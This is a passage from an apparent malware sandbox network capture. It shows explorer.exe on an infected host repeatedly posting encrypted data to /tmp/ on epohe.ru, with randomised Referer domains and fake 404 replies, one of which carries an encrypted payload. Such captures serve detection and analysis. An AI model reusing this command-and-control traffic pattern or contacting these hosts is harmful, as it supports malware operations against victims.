Sep 2, 2024 08:21:07.275480032 CEST	356	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 53 40 cd e8 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuS@oOn)OC/1B{#55WBPE=GR+vb<]#pp9*cJ}Rm,,X3\&dDLP="_nut)+8
Sep 2, 2024 08:21:08.487118959 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49741	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:08.497749090 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rkfklwpuiufh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: epohe.ru
Sep 2, 2024 08:21:08.497760057 CEST	253	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 55 28 ce eb Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuU(T]Cuq(\eSc7d~'d]2x'VVTA65Sq'q`3m8ae^F:1\piF~S;m.\'u
Sep 2, 2024 08:21:09.643055916 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49742	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:09.651580095 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xqysrgfmfacgd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 127 Host: epohe.ru
Sep 2, 2024 08:21:09.651602983 CEST	127	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 71 08 d0 bc Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuqTq`A{m-D}$Qh
Sep 2, 2024 08:21:11.300154924 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49743	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:11.308118105 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bjsidbjqhyjuh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: epohe.ru
Sep 2, 2024 08:21:11.308139086 CEST	335	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5e 42 e9 9d Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu^Bh#}yo@/50nN;^hu[MlG1^[G7S4~Q.G^=E6SB#E%wk)wxg"8
Sep 2, 2024 08:21:11.605308056 CEST	605	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bjsidbjqhyjuh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: epohe.ru Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5e 42 e9 9d 68 23 9c ab e4 7d 14 85 cc db ee f5 79 6f 88 9e b7 cd b2 1a b3 e2 ea 40 d4 17 2f 35 30 11 6e 91 11 b0 4e 3b 8c 8c ec bb ea ad 5e 68 f4 b5 cb 75 c6 5b ba 16 a8 00 d3 4d 6c 47 98 31 5e dd 5b 1a 47 37 9c 53 98 f4 b3 be cb c6 9c ec b2 34 eb c5 c4 7e 51 e3 07 2e c0 b4 47 a4 5e 3d 45 f0 93 a3 af d7 ba f5 da 9b c0 13 1c e1 ae 95 36 d5 fe 9d 53 ab 03 d2 f5 e0 ba 96 c7 c6 80 42 23 91 93 e0 45 25 ce ce c6 1b 17 94 c1 05 ff 77 6b 29 a0 77 a5 d6 99 1e bb db 05 78 67 96 22 1c e6 c5 38 f2 11 0c b6 dd be 89 85 0b bc b2 b2 77 f5 2b c6 10 0d 81 e9 bf 1f d4 2a 32 d8 1d 27 13 9d 4d 73 e8 c3 a0 3f cf 52 e1 48 9b ea 7a 9e 18 2b 73 44 27 e5 ea 01 46 d5 b8 74 9a c8 75 61 2a ac d7 ad 19 36 4c 1a 4a c2 f7 cb 0b f1 bd e1 a6 ca 00 15 6f 8e 4d 93 df ce 26 eb 71 81 27 58 9b f8 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu^Bh#}yo@/50nN;^hu[MlG1^[G7S4~Q.G^=E6SB#E%wk)wxg"8w+2'Ms?RHz+sD'Ftua6LJoM&q'X
Sep 2, 2024 08:21:12.689039946 CEST	219	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ\|~B9=#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49745	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:16.183809042 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rbkqrcgmoxbnb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: epohe.ru
Sep 2, 2024 08:21:16.183840036 CEST	280	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 75 59 d1 94 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA ,[k,vuuYRi&<lTz`e%N?E=Q;CLeh8Dyt.;XEYhn?)VoD)nmq-ww7 <6
Sep 2, 2024 08:21:17.770119905 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49746	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:17.778636932 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ytcopihlywgad.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: epohe.ru
Sep 2, 2024 08:21:17.778650999 CEST	299	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 32 00 ed 95 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu2`^GHf?3Ag.}DB&3ZPQ({v+!\W7;E;bP%=B&myQM#RuC>I:+
Sep 2, 2024 08:21:18.914629936 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49747	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:18.942918062 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ylpbksvjwmy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: epohe.ru
Sep 2, 2024 08:21:18.942945004 CEST	326	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 35 5d fa 85 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu5](G{K^*mX\2Xg)zlBJ@-39[KLXc>2(hW\pVhy4nGb@Y5&W}mv-Pz
Sep 2, 2024 08:21:20.102070093 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49748	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:20.109977961 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lumgcfdgtsy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 303 Host: epohe.ru
Sep 2, 2024 08:21:20.109996080 CEST	303	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 39 4f b8 ee Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu9O]~jIpg1^gqB2yY,VBLIBiP[3`F#s_$oF.?~p}u?=ececa5^
Sep 2, 2024 08:21:22.026204109 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49750	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:22.319582939 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nlfvvperahgbd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 143 Host: epohe.ru
Sep 2, 2024 08:21:22.319618940 CEST	143	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 22 09 ae 87 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu"e3_\|XUiabwulr<tS*@37S\|
Sep 2, 2024 08:21:23.479399920 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
